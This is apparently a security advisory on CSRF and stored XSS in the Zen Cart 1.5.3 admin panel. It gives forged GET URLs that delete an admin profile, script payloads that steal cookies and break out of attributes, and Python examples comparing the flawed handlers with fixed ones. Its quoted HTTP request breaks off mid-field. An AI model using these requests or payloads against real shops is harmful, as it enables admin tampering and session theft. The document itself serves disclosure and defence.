#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
#Date: 09.07.14
#Vendor: zen-cart.com
#Tested on: Apache 2.2 [at] Linux
#Contact: smash[at]devilteam.pl
#1 - CSRF
- Delete admin
The profile parameter of the GET request is the id of the admin profile to delete; the request carries no securityToken, so a logged-in admin's browser will perform it from any page that embeds the URL.
localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2
- Reset layout boxes to default
localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults
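Added example, not Zen Cart's code: a minimal model of the admin delete action above, once as reported (the session cookie the browser attaches automatically is the only authorisation, so a GET triggered by an <img> on any page the admin visits succeeds) and once hardened (state changes must arrive by POST with a securityToken bound to the server-side session). Session, handle_delete_vulnerable, handle_delete_hardened and the helper names are illustrative, not functions in Zen Cart.

```python
"""Added example, not Zen Cart code: CSRF-able GET action vs. a handler that
requires a POST carrying a session-bound securityToken."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# The delete URL quoted in the advisory.
DELETE_URL = ("http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/"
              "profiles.php?action=delete&profile=2")


@dataclass
class Session:
    """Server-side state for one logged-in admin (illustrative).  The token is
    minted once per session; an attacker's page on another origin cannot read it."""
    admins: dict = field(default_factory=lambda: {1: "superuser", 2: "editor"})
    token: str = field(default_factory=lambda: secrets.token_hex(16))


def _requested_delete(url):
    """Return the profile id if the query string asks for action=delete, else None."""
    qs = parse_qs(urlsplit(url).query)
    if qs.get("action") == ["delete"] and "profile" in qs:
        return int(qs["profile"][0])
    return None


def handle_delete_vulnerable(session, method, url, form=None):
    """profiles.php?action=delete&profile=N as reported: whoever holds the
    session cookie can delete, regardless of method or token."""
    pid = _requested_delete(url)
    if pid is None:
        return "noop"
    session.admins.pop(pid, None)
    return "deleted"


def handle_delete_hardened(session, method, url, form=None):
    """Same action, but it must be a POST whose securityToken equals the
    session's token; the comparison is constant-time."""
    pid = _requested_delete(url)
    if pid is None:
        return "noop"
    if method != "POST":
        return "rejected: state change via GET"
    token = (form or {}).get("securityToken", "")
    if not hmac.compare_digest(token, session.token):
        return "rejected: bad securityToken"
    session.admins.pop(pid, None)
    return "deleted"


def cross_site_get(handler):
    """Forged request via <img src=DELETE_URL>: the victim's browser adds the
    cookie; the attacker controls neither the method nor any token.
    Returns (handler result, whether profile 2 still exists)."""
    s = Session()
    return handler(s, "GET", DELETE_URL), 2 in s.admins


def cross_site_post(handler):
    """Forged POST from an auto-submitting form: still no valid token."""
    s = Session()
    return handler(s, "POST", DELETE_URL, {"securityToken": "0" * 32}), 2 in s.admins


def legitimate_post(handler):
    """The admin's own UI submits the token it was rendered with."""
    s = Session()
    return handler(s, "POST", DELETE_URL, {"securityToken": s.token}), 2 in s.admins


if __name__ == "__main__":
    for h in (handle_delete_vulnerable, handle_delete_hardened):
        print(h.__name__, cross_site_get(h), cross_site_post(h), legitimate_post(h))
```

Note that the media-types save request quoted later in this advisory does carry a securityToken field; the CSRF finding is that these particular GET actions change state without one, so the same token check, plus refusing GET for state changes, is the fix to look for.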
#2 - Persistent XSS in admin panel
Since admin privileges are required to plant the following payloads, this is not a serious threat on its own; the payload is, however, stored and rendered to every administrator who later views the affected page.
- Extras -> Media types -> Add
Vulnerable parameters - type_name & type_exit
Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
Content-Length: 663
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="securityToken"
b98019227f8014aed6d22b02f0748d11
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_name"sup
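Added example, not Zen Cart's code: how a stored value like the media-type fields above turns into persistent XSS when the admin listing echoes it raw, and what the same rendering looks like once each value is HTML-encoded for its context. The in-memory store, save_media_type, render_listing and the sample payloads are constructed for this example; the second field is named type_exit as the advisory lists it.

```python
"""Added example, not Zen Cart code: stored admin-panel XSS, vulnerable vs.
escaped rendering of the saved media-type fields."""
import html

# Constructed payloads: what an admin-level attacker could submit as the two
# parameters named in the advisory.  The second one targets an attribute
# context (breaks out of a double-quoted attribute).
SAMPLE_FORM = {
    "type_name": "<script>alert(document.cookie)</script>",
    "type_exit": '" onmouseover="alert(1)',
}


def save_media_type(store, mid, form):
    """Mirrors media_types.php?action=save: values are stored verbatim.
    Storing raw input is fine; the defect is in how it is rendered later."""
    store[mid] = {"type_name": form["type_name"], "type_exit": form["type_exit"]}
    return store


def render_row(entry, escape):
    """One listing row.  The name lands in element content, the second field
    in a double-quoted attribute; html.escape(quote=True) covers both."""
    name, ext = entry["type_name"], entry["type_exit"]
    if escape:
        name, ext = html.escape(name, quote=True), html.escape(ext, quote=True)
    return (f"<tr><td>{name}</td>"
            f'<td><a href="media_types.php?action=edit" title="{ext}">edit</a></td></tr>')


def render_listing(store, escape=False):
    """The admin page that every administrator sees after the save."""
    return "<table>" + "".join(render_row(e, escape) for e in store.values()) + "</table>"


def is_safe(rendered):
    """Check used here: no raw tag from the payload survives and the attribute
    was not broken out of (a raw quote followed by the injected handler)."""
    return "<script" not in rendered and '" onmouseover="' not in rendered


if __name__ == "__main__":
    store = save_media_type({}, 2, SAMPLE_FORM)
    print("vulnerable:", render_listing(store), is_safe(render_listing(store)))
    print("escaped:   ", render_listing(store, escape=True),
          is_safe(render_listing(store, escape=True)))
```

The encoding has to happen at output time and per context (element content vs. attribute value); escaping on input, or stripping `<script>` alone, would leave the attribute break-out in the second field intact.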